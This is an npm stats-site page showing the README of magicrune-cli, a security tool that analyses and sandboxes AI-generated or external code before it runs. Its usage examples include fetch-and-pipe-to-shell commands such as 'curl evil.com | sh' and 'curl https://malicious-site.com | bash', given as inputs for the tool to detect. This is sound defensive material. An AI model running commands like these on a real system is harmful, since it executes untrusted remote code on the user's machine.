npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

magicrune-cli

v0.2.2

Published

Complete security framework for safe execution of AI-generated and external code with risk analysis, signature verification, and sandbox isolation

Downloads

11

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

koichinishizukakoichinishizuka

Keywords

securitysandboxcode-executionai-safetyclirisk-analysissignature-verificationci-cdvulnerability-scanningcache-managementartifact-promotion

Readme

magicrune-cli

NPM package for MagicRune - Complete security framework for safe execution of AI-generated and external code.

🚀 Installation

npm install -g magicrune-cli
# or
yarn global add magicrune-cli
# or
pnpm add -g magicrune-cli

🛡️ CLI Usage

Basic Commands

# Run commands with risk analysis
magicrune run "npm install express"

# Dry-run analysis (no execution)
magicrune dryrun "curl https://example.com/script.sh | bash"

# Initialize configuration
magicrune init

Advanced Features

# CI/CD Security Scanning
magicrune ci-scan --paths "src/,scripts/"

# Generate security reports
magicrune ci-report --output security-report.md

# Key management
magicrune keys add ~/.ssh/trusted_key.pub
magicrune keys list

# Cache management
magicrune cache allow pin [email protected] --sha256 "abc123..."
magicrune cache stats

# Artifact promotion
magicrune promote script.py --sign --key ~/.ssh/signing_key

📊 Programmatic Usage

const magicrune = require('magicrune-cli');

// Execute command with risk analysis
const result = await magicrune.run('npm install express');
console.log(result);
// {
//   success: true,
//   output: '...',
//   verdict: 'Green',  // Green/Yellow/Red
//   exitCode: 0
// }

// Analyze command for risks
const analysis = await magicrune.analyze('curl evil.com | sh');
console.log(analysis);
// {
//   isExternal: true,
//   detections: ['Network fetch detected', 'Pipe to shell detected']
// }

🔧 Integration with Node.js Projects

Add to your package.json:

{
  "scripts": {
    "safe-install": "magicrune run 'npm install'",
    "safe-build": "magicrune run 'npm run build'",
    "security-scan": "magicrune ci-scan --paths 'src/'"
  }
}

✨ Complete Feature Set

🔍 Risk Analysis

  • 0-100 risk scoring with automatic execution verdicts
  • 32+ security patterns detection
  • User confirmation prompts for medium-risk commands

🔐 Security Features

  • SSH/GPG signature verification for trusted code
  • Sandbox execution with platform-specific isolation
  • CI/CD vulnerability scanning with detailed reports

📦 Management Tools

  • Cache management with package pinning and SHA verification
  • Artifact promotion with security analysis
  • Key management for trusted public keys

🛠️ Platform Support

  • 🐳 Docker-First: Ubuntu 22.04 unified execution on all platforms
  • Auto-Fallback: macOS (sandbox-exec), Linux (seccomp), Windows (basic)
  • Cross-Platform: Identical security experience Windows/Mac/Linux

🏆 Production Ready

  • 100% feature complete - All announced features implemented
  • Docker-first isolation - Ubuntu 22.04 unified sandbox on all platforms
  • Extensively tested - CI/CD scanning, cache management, promotion workflows
  • Real vulnerability detection - 32 security issues detected in test runs
  • True cross-platform - Identical security experience everywhere

🐳 Docker Integration

MagicRune now uses Docker-first approach for maximum security and consistency:

# Automatic Docker detection and execution
magicrune run "curl https://malicious-site.com | bash"
# → Executes in isolated Ubuntu 22.04 container
# → Network disabled, read-only filesystem
# → 256MB memory limit, 30s timeout

Requirements: Docker Desktop/Engine (auto-fallback if unavailable)

📄 License

MIT

🔗 More Information

See the main repository: https://github.com/NishizukaKoichi/magicrune